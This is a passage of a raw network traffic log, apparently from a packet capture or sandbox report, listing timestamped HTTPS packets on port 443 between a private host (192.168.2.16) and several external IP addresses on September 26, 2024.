Sep 26, 2024 17:55:28.531784058 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.531795979 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.531840086 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.531843901 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.531858921 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.531900883 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.532298088 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532439947 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532470942 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.532471895 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532481909 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532510042 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.532516956 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532636881 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532670021 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532670975 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.532679081 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532713890 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.532718897 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532758951 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532792091 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532793999 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.532802105 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.532838106 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.532845020 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533238888 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533277988 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.533286095 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533323050 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533351898 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533355951 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.533363104 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533391953 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.533397913 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533536911 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533564091 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533582926 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.533590078 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533618927 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.533626080 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533634901 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.533668041 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.533674955 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534106016 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534138918 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534167051 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.534173965 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534183025 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534224033 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.534231901 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534265995 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534267902 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.534279108 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534317017 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.534385920 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534441948 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534471989 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.534476042 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534485102 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534518003 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.534523964 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534959078 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.534991026 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535008907 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535017014 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535046101 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535053015 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535089970 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535120010 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535121918 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535131931 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535170078 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535209894 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535264015 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535291910 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535295010 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535301924 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535337925 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535373926 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535428047 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535461903 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535464048 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535474062 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535505056 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535511971 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535733938 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535763025 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535763025 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535773039 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535804033 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535891056 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535945892 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535975933 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.535976887 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.535986900 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536020994 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.536062002 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536109924 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536138058 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536149979 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.536156893 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536189079 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.536284924 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536370993 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536398888 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536402941 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.536410093 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536441088 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.536447048 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536556959 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536588907 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536593914 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.536602020 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536633968 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.536634922 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536643982 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536679029 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.536720991 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536803961 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536838055 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.536845922 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.536990881 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.537020922 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.537028074 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.537034988 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.537056923 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.537071943 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.540668011 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.540749073 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.540783882 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.540790081 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.540812969 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.540844917 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.540849924 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.540863037 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.540904045 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.542650938 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.542697906 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.542721033 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.542733908 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.542777061 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.546087027 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.546220064 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.546255112 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.546267986 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.546293020 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.546329975 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.546330929 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.546344042 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.546392918 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.547828913 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.548096895 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.548151970 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.548171997 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.548183918 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.548232079 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.548238993 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.551405907 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.553096056 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.553162098 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.553172112 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.553558111 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.553601980 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.553618908 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.553628922 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.554804087 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.554831982 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.555089951 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.555121899 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.555135012 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.555160046 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.555196047 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.555198908 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.555211067 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.555248022 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.556092024 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.556165934 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.556174040 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.558207989 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.558769941 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.561456919 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.561525106 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.561537027 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.562728882 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.562798023 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.562829971 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.562861919 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.562894106 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.562900066 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.562900066 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.562927008 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.563019037 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.563028097 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.563095093 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.563128948 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.563146114 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.563152075 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.563188076 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.563193083 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.563200951 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.563239098 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.563843966 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.563927889 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.563944101 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.563956976 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.563996077 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.566452980 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.566636086 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.566673994 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.566688061 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.566694975 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.566744089 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.566757917 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.566878080 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.566927910 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.566930056 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.566950083 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.566992044 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.568403006 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.572480917 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.572932005 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.572979927 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.573010921 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.573026896 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.573095083 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.574790001 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.574827909 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.574847937 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.574865103 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.574902058 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.574907064 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.574918985 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.574959993 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.575227022 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.577189922 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.577805996 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.577855110 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.577905893 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.577919960 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.577965975 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.581516027 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.581563950 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.581607103 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.581624031 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.581666946 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.583231926 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.585654020 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.588347912 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588403940 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588413000 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.588427067 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588462114 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.588469028 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588500977 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588536978 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588541985 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.588551044 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588587046 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.588599920 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588709116 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588747025 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.588752985 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588759899 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.588763952 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588799953 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.588810921 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.588820934 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.588829994 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.588838100 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.588865042 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.589803934 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.589858055 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.589873075 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.589884996 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.589891911 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.589930058 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.589939117 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.589963913 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.589973927 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.590008974 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.590010881 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.590032101 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.590079069 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.590085983 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.593719959 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.594403982 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.594607115 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.594641924 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.594675064 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.594683886 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.594696999 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.594727993 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.594767094 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.594814062 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.594825983 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.595706940 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.595757961 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.595796108 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.595815897 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.595860958 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.596832991 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.596865892 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.596896887 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.596904039 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.596930027 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.596955061 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.597054005 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.597095966 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.597105026 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.598268986 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.598349094 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.598392010 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.598400116 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.599239111 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.599289894 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.599292040 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.599314928 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.599395037 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.600435019 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.600526094 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.600548029 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.601542950 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.601603985 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.601615906 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.601629019 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.601674080 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.601680994 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.601687908 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.601730108 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.601739883 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.602916002 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.603004932 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.603015900 CEST	443	49742	172.217.16.132	192.168.2.16
